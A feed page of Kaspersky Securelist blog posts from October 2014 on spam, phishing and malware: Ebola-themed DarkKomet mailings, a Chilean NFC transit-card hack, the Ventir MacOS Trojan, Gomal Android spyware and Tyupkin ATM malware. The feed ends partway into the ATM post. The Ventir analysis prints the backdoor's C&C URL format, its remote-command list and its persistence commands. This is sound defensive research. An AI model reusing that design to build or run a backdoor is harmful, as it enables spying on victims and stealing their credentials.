Secure List feed for B2B

Syndicate content
Online headquarters of Kaspersky Lab security experts.
Updated: 22 hours 6 min ago

A false choice: the Ebola virus or malware?

Thu, 10/23/2014 - 09:31

In September we came across mentions of people in Africa suffering from the Ebola virus and unusual invitations to a conference of the World Health Organisation (WHO) in the subject line of so-called "Nigerian" emails.  The aim of the conmen was, as usual, to swindle money from trusting recipients who entered into conversation with the authors of the letters.

In October it was the turn of the cybercriminals, who used the tumult around the Ebola virus to send letters containing malware. Once again the WHO was indicated as the sender of the letters, which is unsurprising as this is the organisation that deals with various diseases and epidemics on a worldwide level.

In the text of the letters we detected the evildoers tried to convince recipients that the WHO has prepared a file with general information and security measures that will help protect users and those around them from the deadly virus and other diseases. Furthermore the recipient was also asked to distribute this information to help the WHO.

To mask the real link a link abbreviation service was used, which finally redirected users to a popular cloud data storage service. There the criminals had stored the malware program Backdoor.Win32.DarkKomet.dtzn disguised as a document from the WHO. This malware is designed to steal personal data. We note that access to the file was blocked quite quickly by the service administrators and, probably for that reason, the evildoers decided to change their letter. The very next day our traps caught a similar communication supposedly from the WHO, only this time the archive with the same malware program was inserted into the letter itself.

Cybercriminals rarely miss a chance to use current events and the names of famous organisations to trick the recipients of their spam. And so, having fallen for the convincing header and failed to pay attention for even a moment, users risk compromising their personal data and surrendering control of their computer to criminals. It is worth remembering that modern anti-virus solutions provide protection but it is only the considered actions of users that can keep their personal data safe.

Spam in September 2014

Thu, 10/23/2014 - 07:00
Spam in the spotlight

In September, "Nigerian" scammers sent out stories relating to the breaking news of the Ebola epidemic. There was festive spam, focusing on both the US Labor Day celebration and the upcoming winter holidays: spammers have started to offer products and services for Christmas. A large part of the major theme mailings promoted products and services using popular social networking sites: the spammers promised an instant influx of new customers and income growth.

The Ebola virus in "Nigerian" spam

In July, the first reports about the Ebola outbreak in Africa appeared in the media. While the world's attention was focused on how to fight the epidemic and prevent it spreading further, scammers used the disease to create new stories for their "Nigerian" letters.

In September, we came across several mailings which mentioned Ebola. In addition to the popular "Nigerian" legends written supposedly on behalf of people with various diseases the fraudsters made up quite unusual stories. For example, an email from a rich Liberian lady dying from Ebola contained a long story about her children who died from the virus and about the local medical center which refused to help her. She was willing to donate more than $1.5 million to a recipient who would transfer this money to charities. The message contained a detailed description of the situation that is unusual for "Nigerian" letters. However, this long story was still nothing more than yet another trick to make recipients believe the story and start corresponding with the scammers.

The authors of another fraudulent mailing introduced themselves as an employee of the World Health Organization and tried an unusual tack to attract attention – the reader was invited to a conference where Ebola would be discussed along with other medical issues. The recipient was not only invited to participate in the conference as a guest but was also offered 350,000 Euro and an automobile for his work as the WHO Representative in the UK. If the victim was interested in the offer, he had to provide his personal data. Apparently, the scammers hoped that the offer of money and work in an international company would ease all the user's doubts.

Holiday spam

In early September, the United States celebrated Labor Day and the spammers were determined not to miss out on the event. Traditionally, in the run-up to the holidays people are attracted by discounts and sales. This time, companies selling print cartridges offered discounts not only for Labor Day but also the beginning of the new school year. Pharmaceutical spam advertizing drugs for weight loss also offered discounts related to the holiday.

Spam traffic around the world also contained adverts for goods and services related to Christmas. English-language messages offered a Christmas party on board a ship and urged early booking to get the lowest prices. In addition, the spammers encouraged people to start thinking of buying Christmas gifts in September and order digital devices directly from Chinese manufacturers as well as ordering a Christmas tree for the holiday.

Earnings and advertising on social networking sites

Another major theme this month was spam messages advertising various ways to earn money online using popular social networking sites. Most often, spammers offered to create an individual profile or a group in Twitter, Facebook or LinkedIn, to design a page according to the concept of the company and the goods it sells, to provide the first subscribers as well as to create the primary content and begin to actively promote it. Naturally, all this came at a cost. After such a comprehensive approach to creating a community in a social network the authors of the mailings promised a sharp increase in the customer numbers and sales volumes. Users were asked to apply by following a link in the email.

Spammers also spent plenty of time offering professional business promotion by placing photos and videos on specialist social networking sites. The authors of these mailings also promised to provide their customers with the necessary number of subscribers, for example, in Instagram, to place the photos of goods and to achieve the first results within the next three days. The recipients were often invited to make a video presentation of the company or the product and to post it on the popular video hosting YouTube. The spammers also promised that users could make "an obscene amount of money" with the help of YouTube by spending just 40 minutes a day on it. However, these mailings were nothing more than adverts about yet another author marketing course on DVD. To buy the DVD the recipient needed to follow a link in the email to enter the necessary website and make an order.

In September, we also came across the mailings containing invitations to seminars and webinars dedicated to the "art" of group and community administration on social networks. The authors of these training sessions promised to reveal all the secrets of an administrator's work (for example, on Facebook or LinkedIn), leading to a stable monthly income for students. To register for a webinar, the recipient had to click on the link in the email.

According to the authors of foreign language spam mailings, the most popular source for attracting new customers and revenue growth was, of course, Facebook. So the  spammers proposed using the network to promote personal ads, to link specific redirects to posts and photos – in this case the number of potential customers would depend on the quality of the content and the willingness of the users to click the links published in the communities. To accomplish this, they suggested special software which could be bought via spam mailings. Sites with detailed descriptions of the software had been created a few months ago and their names contained such words as "customers", "income", "Facebook"

Spam for collectors

Among the most interesting mailings of the month were collector-oriented spam messages sent. English-language users were offered a free booklet on British medals from the First World War. The emails with the generous offer supposedly came from the SSAFA, a charity created to assist British war veterans and their families. However the official website of this organization had no information on the promotion while online feedback pointed out that the mailing was unsolicited. The message linked to an order page where recipients were asked to provide contact details including a phone number. This is one of the ways the fraudsters collect user personal data which will later be used for promotional purposes. For example, a phone database can be used for cold calls to sell goods and services.

Another mass mailing was distributed on behalf of a collector. In his emails he spoke about his hobby - collecting badges and stickers with the logos of various organizations. He wrote to different companies asking for samples for his collection. Although it's unlikely that these emails were fraudulent, they were unsolicited and therefore were classified as spam.

Statistics The percentage of spam in email traffic

The percentage of spam in email traffic

The percentage of spam in September's email traffic averaged 66.5%, which is 0.7 percentage points down from August. The amount of unsolicited email consistently decreased throughout the month – in early September the percentage of spam averaged 69.3% while in the end it dropped to 63.1%.

Sources of spam by country

In September, the Top 3 most popular sources of spam were as follows. The USA remained in first position (12%) although its contribution was down nearly 4 percentage points from the previous month. Vietnam moved from fourth to second place with 9.3%; up 4.6 percentage points. Russia was in third place with 5.8% - there was little change in its numbers and it dropped one place in the table.

Sources of spam around the world

China was in 4th position with 5.6% of all distributed spam; its contribution dropped by nearly 1 pp. It is followed by India (4.7%): with almost 2 pp growth this country rocketed from 10th in August to 5th in September.

South Korea (3.2%) also increased its share by 1.3pp and placed 7th, up eight from the previous month. Meanwhile, Germany (2.9%) lost 0.7 pp and fell from 6th to 9th place in September. The Top 10 was completed with Taiwan with 2.5% of all distributed spam. France, Spain and Italy also produced a little more than 2% of the world spam.

Sources of spam in Europe by country

Vietnam was September's leading source of spam sent to European users (11.1%). Next came the USA with 9.1% and Russia on 6%.

They are followed by China (5.3%), India (4.5%), Argentina (3.7%) and South Korea (3.5%). About 3% of European spam originated from each of Brazil, Germany and.

The rating also includes Taiwan (2.7%), Spain (2.6%), Italy (2.5%) and Mexico (2.3%) in 11th-14th place. Iran was in 15th position with 2.2% of spam sent to European users. The percentage of spam that originated from elsewhere did not exceed 2%.

Malicious attachments in email traffic

In September, the Top 10 malicious programs distributed via email were:

Top 10 malicious programs distributed via email

Dofoil:Trojan-Downloader.Win32.Dofoil.dx, Trojan-Downloader.Win32.Dofoil.dy and Trojan-Downloader.Win32.Dofoil.dz occupied 1st, 6th and 9th places respectively. This type of malware downloads other malicious programs onto the victim computer and uses them to steal user data (primarily passwords) which it then sends to the fraudsters.

Trojan-Spy.HTML.Fraud.gen was in 2nd position. As we wrote before, this piece of malware from the Fraud.gen family is a fake data entry HTML page that is sent to users by email, disguised as an important message from large commercial banks, online stores, software companies etc.

Trojan-Banker.HTML.PayPal.b came 4th. This malicious program appears in the form of the HTML page imitating a PayPal form. Recipients of an email containing this attachment is asked to fill in the form to update their PayPal account after the launch of the new IT security system. The German-language form includes fields like E-Mail Adresse, PayPal passwort,  Vollständiger Name, Nachname der Mutter (Fakultativ),  Geburtsdatum, Telefonnummer,  Adresse,  Stadt,  Land, Postzahl,    Kartennummer, Verfallsdatum,   Kartenprüfnummer, VBV Passwort / MasterCard. It seems the fraudsters are targeting German-speaking PayPal users.

Trojan-Downloader.MSWord.Agent.ba and Trojan-Downloader.MSWord.Agent.bf placed 5th and 8th in the ranking. These programs imitate a .doc file with built-in macros written in Visual Basic for Applications (VBA), which are executed when opening the document. The macros download and run malicious software, such as representatives of the Andromeda family.

Trojan.Win32.Vundo.adc completed the list of the most popular malicious programs distributed via email. This program downloads other malware, for example, Trojan-Banker.Win32.Fibbit, which compromises the data passing through banking client applications. The Trojan intercepts keystrokes, copies data from the clipboard, searches for file certificates with the .jks extension, makes screenshots and tries to read the "keys.dat" file. All the stolen data is packed in the CAB archive and sent to the attacker's server.

Distribution of email antivirus detections by country

For several month in a row, the three countries with the most antivirus detections have been Germany, the UK and the USA, each jostling for position at the top.  In September, Germany took the lead (9.11%) followed by the UK (8.45%) and the USA (8.26%)

Russia was a big mover once again– after unexpectedly rising to 4th place in August it lost 4.14 percentage points and dropped down to 13th.

Special features of malicious spam

In September many mailings containing malicious attachments dealt with matters of hiring and firing. We registered a mass mailing that told recipient their employment contract withan organization (the company name varied from email to email) had been terminated for violations of the company's internal policy. The messages even provided number and date of the alleged violations. The email also stated that recipients had already been issued written warnings demanding improved behavior in future. However, since nothing had been done, the labor contract was terminated.

To appeal this decision the recipient was invited to consult the lawyer before a specified deadline. The email contained an attached archive with documents about the supposed violations.  To view the document, the recipient had to open the attachment. In fact, though, the attachment contained a representative of the Trojan-Downloader.Win32.Cabby family. This malware downloads other malicious software onto a victim computer, including various modifications of the Zbot family of programs.

Phishing

In September, Kaspersky Lab's anti-phishing component registered 18,779,357 detections, 13,874,415 detections less than in the previous month. This decline in the amount of phishing was caused by the end of the summer slowdown and the beginning of the business season. It should also be noted that September is often a month for presentations and other major company events. In the run-up to these, phisher activity grows leading to a spike in the number of fraudulent attempts at the end of the summer

In September, Brazil (17.8%) was once again the leading country for phishing attacks, even though its share was down 1.7 percentage points. Australia dropped to 3rd with 11.1% of all antivirus detections. Second came India (13.4%). The UAE (10.5%) and France (10.4%) were in 4th and 5th positions respectively.

The geography of phishing attacks*, September 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

  Country % of users 1 Brazil 17.8 2 India 13.4 3 Australia 11.2 4 UAE 10.5 5 France 10.4 6 Canada 9.9 7 China 9.9 9 Columbia 9.4 8 Bangladesh 9.0 10 UK 8.0 Targets of attacks by organization

The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In September, Global Internet Portals were again the leading category among the organizations most often attacked by phishers with 24.7%, even though the share decreased by 6.1 pp. The contribution of Social networks (20.2%) rose by 2.8 pp from the previous month.

Organizations most frequently targeted by phishers, by category – September 2014

Financial phishing accounted for 36.9%of all detections made by Kaspersky Lab's anti-phishing component, a 1.7 pp growth compared with the previous month. The percentage of detections affecting Banks accounted for 18.9% (+0.5pp), followed by online stores (11.4%, +1.4%) and E-payment systems (7.3%, +0.5%).

Top 3 organizations most frequently targeted by phishers   Organization % of detections 1 Facebook 11.16% 2 Yahoo! 7.10% 3 Google 6.31%

In September, Facebook (11.1%) was most heavily targeted by phishers: its share was up 1.1 pp. Yahoo came 2nd with 7.1% of all Anti-Phishing component detections. The share of Google services halved compared to August and accounted for 6.3%, placing this organization 3rd.

September's spam traffic contained phishing mailings aimed at stealing logins and passwords to accounts with the popular Chinese online store Alibaba.com. The scammers tried to convince recipients to update their accounts or confirm their use with refer to a new security system and account maintenance. The design of fake the messages used the official logo and the Auto Signature of Alibaba.com as well as the standard anti-virus notification about the absence of threats in the email. The 'From' field named Alibaba.com as the sender and the sender's address contained mainly legitimate domain names. However, on closer examination, an observant recipient could notice spelling mistakes in the addresses of senders and see domain names which obviously did not belong to the company.

Phishing pages were included directly in the fake emails and had a similar design. Recipients had to fill in the fields entering not only email addresses and passwords but also company names, countries of residence and mobile phone numbers. This way the fraudsters collected additional information about their victims for use in future scams.

Conclusion

In September, the percentage of spam in email traffic decreased by 0.7pp and averaged 66.5%. The main distributors of spam were the USA (12%), Vietnam (9.3%) and Russia (5.8%).

A Trojan downloader from the Dofoil family topped the rating of the most popular malware spread via email. This malicious program is used to download other malware onto victim computers.

In September, Kaspersky Lab's anti-phishing component registered 18,779,357 detections. According to the statistics, 17.8% of all detections targeted the users in Brazil. Australia, which was August's leader, moved down to 3rd position (11.1%). Global Internet Portals remained the leading category among the organizations most often attacked by phishers with 24.7% of all attacks. Financial phishing accounted for 36.9% of all detections made by Kaspersky Lab's anti-phishing component, a 1.7 pp growth compared with the previous month. In September's the Top 3 organizations most frequently targeted by phishers Facebook took the lead with (11.1%) of all detections.

In September, "Nigerian" scammers switched their attention from events in Ukraine to health issues, in particular to the Ebola virus which was rarely far from the headlines this month.

Promotional mailings offered goods and services dedicated to America's Labor Day celebrations, as well as to the popular winter holidays celebrated worldwide. From now on we expect to see a sharp rise in the percentage of spam dedicated to Christmas and New Year festivities until it reaches its December peak.

Leave your passwords at the Checkout Desk

Thu, 10/23/2014 - 04:20

Hotels, Restaurants and Airports used to offer customers free tablets while using their facilities. Recently while attending an event and staying in one such hotel, I had the chance to use a free iPad especially installed in my room.

To my surprise, it not only contained the event agenda and provided a free WiFi connection, but also included a lot of private personal information from previous guests who had stayed in the same room.

When I speak about private personal information, I mean accounts with pre-saved passwords, authorized sessions on social networks, search results from the browser (mostly pornographic content), full contacts automatically saved into the address book, iMessages and even a pregnancy calculator with real information. It was not hard even to figure out that the identity of the woman who had used it, since she also left her personal contact information on the device:

Having full names and email addresses cached on the device, it was not hard to Google a little bit and find out that some of the users were very public people working for the government of the country where I was staying.

Most of sessions were still open, even allowing the posting / sending of messages in the name of the user:

This is completely unacceptable, from a security perspective. Basically a potential attacker had the chance not only read sent and received messages but also to impersonate the victim by sending messages in their name.

I also see this scenario as a perfect personal data collector for high profile spear phishing campaigns. On the other hand, if a potential attacker came from a classic cybercrime sphere, they might blackmail their victims. Moreover, it would be extremely easy for the criminal to do this, since they would have all kinds of data of the victims, including the name of pornographic movies watched on each specific date and time. Bearing in mind that some of the potential victims are public people and work for the government, most probably such blackmail would be successful.

So, what's wrong here? Well, I would say everything. First, it is unwise to use a free public device for personal and private communication. You just never know if the device is backdoored or who might be behind such hospitality? Second, if a public facility wants to offer its guests free portable devices for the duration of their stay, it's important that such devices are a properly configured first, to apply sensible security policies such as not storing personal information, not saving passwords and so on.

Maybe I'm too suspicious, but having an unknown and untrusted device like a tablet in my room, which is equipped with an embedded camera and a mic, I just preferred to switch it off and store it inside a drawer. I had to do this every afternoon since the cleaning staff put it back  on the desk every day I was at the hotel.

You have also remember that, even if such a free device is properly configured and does not visibly store any private information, you can't be sure that the next guest is not an expert in forensic analysis, in which case they could just take an image of the whole device and then recover your personal information step by step.

You may follow me on twitter: @dimitribest

Android NFC hack allow users to have free rides in public transportation

Tue, 10/21/2014 - 12:39

"Tarjeta BIP!" is the electronic payment system used in Chile to pay for public transportation via NFC incorporated in the user's smartphone. Numerous projects enabling mobile NFC ticketing for public transportation have been already executed worldwide. This is a trend. It means that criminal minds should be interested in it. Moreover, they are.

More and more people keep talking about the feature of payments via NFC. The problem in this particular case is that somebody reversed the "Tarjeta BIP!" cards and found a means to re-charge them for free. So, on Oct. 16 the very first widely-available app for Android appeared, allowing users to load these transportation cards with 10k Chilean pesos, a sum  equal to approximately $17 USD.

MD5 (PuntoBIP.apk) = 06a676fd9b104fd12a25ee5bd1874176

Immediately after appearing on the Internet, many users downloaded it and proved they were able to recharge their travel cards. All they had to do is to install the mentioned app on a NFC capable Android device, to approach the travel card to the phone and then to push the button "Cargar 10k", which means "Refill the card with 10,000" Chilean pesos.

According to the metadata of the .dex file package, it was compiled on October 16, 2014 and it has 884.5 kB (884491 Byte) size. The feature it incorporates interacts directly with the NFC port: android.hardware.nfc

The app has four main features: "número BIP" - to get the number of the card, "saldo BIP" - to get the available balance, "Data carga" - to refill available balance and finally, maybe the most interesting is "cambiar número BIP" - allowing the user to change the card number altogether. Why would we say this last feature is the most interesting? Well, a source suggested the authorities were going to block fraudulently refilled BIP cards. However, as we can see, the app is able to change the BIP number.

Since the original links to download the app were taken down, new links appeared, now pointing to new servers and actually hosting a new app:

MD5 (PuntoBIP-Reloaded.apk) = 2c20d1823699ae9600dad9cd59e03021

This is a modified version of the previous app, compiled on the next business day Oct 17, 2014 and which is a lot bigger 2.7 MB (2711229 Byte). This includes an advertisement module which shows ads via the doubleclick network.

Since both apps allow users to hack a legitimate application, they are now detected by Kaspersky as HEUR:HackTool.AndroidOS.Stip.a

Since the app is a hot one and a lot of people from Chile are looking for it, I expect some bad guys to come along and create fake similar apps but trojanized to infect mobile users and take some advantage of their interest.

At the same time, it is important to mention that mobile payments are getting more and more popular. NFC is one of the most promising ports in this field. This is a good example of how fresh new payment schemes often present the same old problems.

Thanks to Roman Unuchek for his analytical insights.

You may follow me on twitter: @dimitribest

The Ventir Trojan: assemble your MacOS spy

Thu, 10/16/2014 - 10:00

We got an interesting file (MD5 9283c61f8cce4258c8111aaf098d21ee) for analysis a short while ago. It turned out to be a sample of modular malware for MacOS X. Even after preliminary analysis it was clear that the file was not designed for any good purpose: an ordinary 64-bit mach-o executable contained several more mach-o files in its data section; it set one of them to autorun, which is typical of Trojan-Droppers.

Further investigation showed that a backdoor, a keylogger and a Trojan-Spy were hidden inside the sample. It is particularly noteworthy that the keylogger uses an open-source kernel extension. The extension's code is publicly available, for example, on GitHub!

Depending on their purpose, these files are detected by Kaspersky Lab antivirus solutions as Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a and not-a-virus:Monitor.OSX.LogKext.c.

Source file (Trojan-Dropper.OSX.Ventir.a)

As soon as it is launched, the dropper checks whether it has root access by calling the geteuid () function. The result of the check determines where the Trojan's files will be installed:

  • If it has root access, the files will be installed in /Library/.local and /Library/LaunchDaemons;
  • If it does not have root access, the files will be installed in ~/Library/.local and ~/Library/LaunchAgents ("~" stands for the path to the current user's home directory).

All files of the Trojan to be downloaded to the victim machine are initially located in the "__data" section of the dropper file.

Location of the Trojan's files inside the dropper

As a result, the following files will be installed on the infected system:

  1. Library/.local/updated – re-launches files update and EventMonitor in the event of unexpected termination.
  2. Library/.local/reweb – used to re-launch the file updated.
  3. Library/.local/update – the backdoor module.
  4. Library/.local/libweb.db – the malicious program's database file. Initially contains the Trojan's global settings, such as the C&C address.
  5. Library/LaunchAgents (or LaunchDaemons)/com.updated.launchagent.plist – the properties file used to set the file Library/.local/updated to autorun using the launchd daemon.
  6. Depending on whether root access is available:

    А) if it is – /Library/.local/kext.tar. The following files are extracted from the archive:

    • updated.kext – the driver that intercepts user keystrokes
    • Keymap.plist – the map which matches the codes of the keys pressed by the user to the characters associated with these codes;
    • EventMonitor – the agent which logs keystrokes as well as certain system events to the following file: Library/.local/.logfile.

    B) if it isn't – ~/Library/.local/EventMonitor. This is the agent that logs the current active window name and the keystrokes to the following file: Library/.local/.logfile

After installing these files, the Trojan sets the file updated to autorun using launchctl – the standard console utility (launchctl load% s/com.updated.launchagent.plist command).

Next, if root access is available, the dropper loads the logging driver into the kernel using the standard utility OSX kextload (kextload /System/Library/Extensions/updated.kext command)

After that, Trojan-Dropper.OSX.Ventir.a launches the file reweb and removes itself from the system.

Updated and reweb files

The file updated terminates all processes with the name reweb (killall -9 reweb command). After that, it regularly checks whether the processes EventMonitor and update are running and restarts them if necessary.

The file reweb terminates all processes with the names updated and update and then runs the file Library/.local/updated.

Update (Backdoor.OSX.Ventir.a) file

The backdoor first allocates the field values from the config table of the libweb.db database to local variables for further use.

To receive commands from C&C, the  malware uses an HTTP GET request in the following format: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0, where key is some key stored in libweb.db in the config table; udid is the MAC address and 220.175.13.250:82 is the IP-address and port of the C & C server.

This request is sent regularly at short intervals in an infinite loop.

The backdoor can process the following commands from C&C:

  • reboot – restart the computer;
  • restart – restart the backdoor by launching reweb file;
  • uninstall – completely remove the backdoor from the system
  • show config – send data from the config table to the C&C server;
  • down exec – update the file update, download it from the C&C-server;
  • down config – update configuration file libweb.db, download it from the C&C server;
  • upload config – send the file libweb.db to the C&C server;
  • update config:[parameters] – update the config table in the libweb.db database file; values of fields from the table are sent as parameters;
  • executeCMD:[ parameter] – execute the command specified in the parameter using the function popen(cmd, "r"); send the command's output to the C & C server;
  • executeSYS:[parameter] – execute the command specified in the parameter using the function system(cmd);
  • executePATH:[parameter] – run file from the Library/.local/ directory; the file name is sent in the parameter;
  • uploadfrompath:[parameter] – upload file with the name specified in the parameter from the Library/.local/ directory to the C&C server;
  • downfile:[parameters] – download file with the name specified in a parameter from the C&C server and save it to the path specified in another parameter.

Some of the commands processed by the backdoor module

EventMonitor (Trojan-Spy.OSX.Ventir.a) file

This file is downloaded to the system if the dropper cannot get root access. Once launched, Trojan-Spy.OSX.Ventir.a installs its own system event handler using Carbon Event Manager API functions. The new handler intercepts all keystroke events and logs them to the file ~/Library/.local/.logfile. Modifier buttons (e.g., shift) are logged as follows: [command], [option], [ctrl], [fn], [ESC], [tab], [backspace], etc.

Keyboard event handler

Immediately before processing a keystroke, the malware determines the name of the process whose window is currently active. To do this, it uses GetFrontProcess and CopyProcessName functions from Carbon API. The name of the process is also logged as [Application {process_name} is the frontwindow]. This enables the Trojan's owner to determine in which application the phrase logged was entered.

kext.tar (not-a-virus:Monitor.OSX.LogKext.c) file

As mentioned above, the kext.tar archive is downloaded to the infected computer if Trojan-Dropper.OSX.Ventir has successfully got root access. The archive contains three files:

  • updated.kext
  • EventMonitor
  • Keymap.plist

The updated.kext software package is an open-source kernel extension (kext) designed to intercept keystrokes. This extension has long been detected by Kaspersky Lab products as not-a-virus:Monitor.OSX.LogKext.c and the source code (as it mentioned earlier) is currently available to the general public.

The file Keymap.plist is a map which matches the codes of keys pressed to their values. The file EventMonitor uses it to determine key values based on the codes provided to it by the file updated.kext.

The file EventMonitor is an agent file that receives data from the updated.kext kernel extension, processes it and records it in the /Library/.local/.logfile log file. Below is a fragment of the log that contains a login and password intercepted by the Trojan

As the screenshot demonstrates, as soon as a victim enters the username and password to his or her email account on yandex.ru, the data is immediately logged and falls into the cybercriminals' hands.

This threat is especially significant in view of the recent leaks of login and password databases from Yandex, Mail.ru and Gmail. It is quite possible that malware from the Ventir family was used to supply data to the databases published by cybercriminals.

In conclusion, it should be noted that Trojan-Dropper.OSX.Ventir.a with its modular structure is similar to the infamous Trojan.OSX.Morcut (aka OSX/Crisis), which had approximately the same number of modules with similar functionality. Using open-source software makes it much easier for cybercriminals to create new malware. This means we can safely assume that the number of Trojan-Spy programs will only grow in the future.

Microsoft Security Updates October 2014

Tue, 10/14/2014 - 18:23

Update (2014.10.15) - administrative notes for preparation... Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig, for some it was ~200 mb. Also, this cycle likely requires everyone a reboot to complete.

*******

This morning was possibly one of the most information rich in the history of Microsoft's patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog actor was losing an IE 0day being patched, and that seemed unusual. This month, several vulnerabilities abused with 0day exploits by known APT actors are being patched and the actors are being publicly noted. So today Microsoft pushes out eight security bulletins MS14-056 through MS14-063, including three rated critical.

The most interesting of today's vulnerabilities are two that are enabled by Windows functionality, but are useful for spearphishing targets with Office-type data file attachments - an Excel file, PowerPoint Show, Word document, and so on. The first of the two remind us of the Duqu attacksMS14-058 patches yet another kernel level font handling flaw CVE-2014-4148, the same kind of issue seen in the Duqu spearphish exploits. This one is rated critical by Microsoft. No one particular actor has been associated with this attack or exploit just yet.

The Windows OLE vulnerability patched with MS14-060 is surprisingly rated "Important" by Microsoft. The APT known as the "Sandworm team" deployed CVE-2014-4114 in incidents against targets alongside other known exploits. The group was known for deploying new variants of the BlackEnergy bot in cyber-espionage campaigns, hitting geopolitical and military targets. In one incident, the team sent spearphish as a PowerPoint slide deck containing the 0day OLE exploit to Ukrainian government and US academic organizations. When opened, the slides dropped newer variants of BlackEnergy to the victim systems. These newer variants of BlackEnergy maintain functionality dedicated to cyber espionage tasks.The most interesting characteristics of these BlackEnergy trojans are the custom plugins or modules, but that's for a different blog post. Our GReAT researchers Maria Garnaeva and Sergey Lozhkin spoke about interesting BlackEnergy functionality at the May 2014 PHDays conference.

Another group known as Hurricane Panda attempted to exploit CVE-2014-4113 in targeted environments. This escalation of privilege issue can present a real problem in situations where an attacker has gotten in to a network and is attempting to burrow in further. This bug also exists in Windows kernel code, and is patched by the same MS14-058 bulletin mentioned above.

The Internet Explorer update addresses fourteen vulnerabilities, rated critical for IE6 through IE11. They do not affect Server Core installations.

More can be read about October 2014 Microsoft Security Bulletins here.

Tic Tac Toe with a twist

Fri, 10/10/2014 - 05:00

UPDATE / OCT, 15.

Further to this blog post, describing malicious functions of a mobile Trojan camouflaged as the TicTacToe game app, Lacoon Mobile Security company stated that TicTacToe was developed by them as a proof-of-concept.

Kaspersky Lab would like to reiterate, that as a security company, we detect all forms of malicious program, regardless of their origin or purpose. We recieved the samples through malware exchange with other antivirus companies and it was not marked as a proof-of-concept at this time. We saw several potentially malicious functions in this app – and a thorough analysis of TicTacToe revealed that the game code accounted for less than 30% of the executable file's size. The rest is functionality appeared for monitoring user and obtaining personal data. It is for this reason that we began the investigation and reported the incident to the public.

We respect and support other security companies who aspire to the development of mobile technologies, but we also believe that proof-of-concept programs should be marked clearly and shouldn't demonstrate fully-operational functions, to avoid situations where malicious users replicate the techniques.

Attempts by cybercriminals to disguise malware as useful applications are common to the point of being commonplace. However, the developers of Gomal, a new mobile Trojan, not only achieved a new level of camouflage by adding Tic Tac Toe game to their malicious program, but also implemented interesting techniques which are new to this kind of malware.

It all started with a Tic Tac Toe game being sent to us for analysis. At first glance, the app looked quite harmless:

However, the list of permissions requested by the game made us wonder. Why would it need to access the Internet, the user's contacts and the SMS archive or to be able to process calls and record sound? We analyzed the 'game' and it turned out to be a piece of multi-purpose spyware. The malicious app is now detected by Kaspersky Lab products as Trojan-Spy.AndroidOS.Gomal.a.

A thorough analysis of the malicious program showed that the game code accounts for less than 30% of the executable file's size. The rest is functionality for spying on the user and stealing personal data.

Game code is marked in green, malicious functionality – in red

What does this functionality include? First and foremost, the malware has sound recording functions, which are now standard for mobile spyware:

It also has SMS-stealing functionality:

In addition, the Trojan collects information about the device and sends all the data collected to its masters' server. But Trojan-Spy.AndroidOS.Gomal.a has something really curious up its sleeve – a package of interesting libraries distributed with it.

The package includes an exploit used to obtain root privileges on the Android device. The extended privileges give the app access to various services provided by Linux (the operating system on which Android is based), including the ability to read process memory and /maps.

After obtaining root access, the Trojan gets down to work. For example, it steals emails from Good for Enterprise, if the app is installed on the smartphone. The application is positioned as a secure email client for corporate use, so the theft of data from it can mean serious problems for the company where the owner of the device works. In order to attack Good for Enterprise, the Trojan uses the console to get the ID of the relevant process (ps command) and reads virtual file /proc/ /maps. The file contains information about memory blocks allocated to the application.

After getting the list of memory blocks, the malware finds the block [heap] containing the application's string data and creates its dump using one more library from its package. Next, the dump file created is searched for signatures characteristic of emails and the messages found are sent to the cybercriminals' server.

Gomal also steals data from logcat – the logging service built into Android that is used for application debugging. Developers very often have their applications outputting critically important data to Logcat even after the apps have been released. This enables the Trojan to steal even more confidential data from other programs.

As a result, the seemingly harmless game of Tic Tac Toe gives cybercriminals access to an enormous amount of the user's personal data and corporate data belonging to his employer. The techniques used by Gomal were originally implemented in Windows Trojans, but now, as we can see, they have moved on to Android malware. And, most dangerously, the principles upon which this technique is based can be used to steal data from applications other than Good for Enterprise – it is likely that a range of mobile malware designed to attack popular email clients, messengers and other programs will appear in the near future.

To reduce the risk of infection by mobile malware we recommend that users:
  • Do not activate the "Install applications from third-party sources" option
  • Only install applications from official channels (Google Play, Amazon Store, etc.)
  • When installing new apps, carefully study which rights they request
  • If the requested rights do not correspond with the app's intended functions, do not install the app
  • Use protection software
Update:

Trojan-Spy.AndroidOS.Gomal.a uses an old version of the exploit, which is effective on Samsung devices running Android 4.0.4 or earlier. This particular version of the malware could not successfully attack a corporate email client on devices with newer firmware.
So far, we have not seen any attempts to infect our users with the Gomal Trojan. However, even though this sample is not currently active in-the-wild, we detect it so we will be able to block any future attacks by mobile malicious programs based on this proof-of-concept malware.

Tyupkin: Manipulating ATM Machines with Malware

Tue, 10/07/2014 - 04:00

Earlier this year, at the request of a financial institution, Kaspersky Lab's Global Research and Analysis Team performed a forensics investigation into a cyber-criminal attack targeting multiple ATMs in Eastern Europe.

During the course of this investigation, we discovered a piece of malware that allowed attackers to empty the ATM cash cassettes via direct manipulation.

At the time of the investigation, the malware was active on more than 50 ATMs at banking institutions in Eastern Europe.  Based on submissions to VirusTotal, we believe that the malware has spread to several other countries, including the U.S., India and China.

Due to the nature of the devices where this malware is run, we do not have KSN data to determine the extent of the infections. However, based on statistics culled from VirusTotal, we have seen malware submissions from the following countries:


This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

The malware uses several sneaky techniques to avoid detection. First of all, it is only active at a specific time at night.  It also uses a key based on a random seed for every session. Without this key, nobody can interact with the infected ATM.

When the key is entered correctly, the malware displays information on how much money is available in every cassette and allows an attacker with physical access to the ATM to withdraw 40 notes from the selected cassette.

Most of the analyzed samples were compiled around March 2014. However this malware has evolved over time. In its last variant (version .d) the malware implements anti debug and anti emulation techniques, and also disables McAfee Solidcore from the infected system.

Analysis

According to footage from security cameras at the location of the infected ATMs, the attackers were able to manipulate the device and install the malware via a bootable CD.

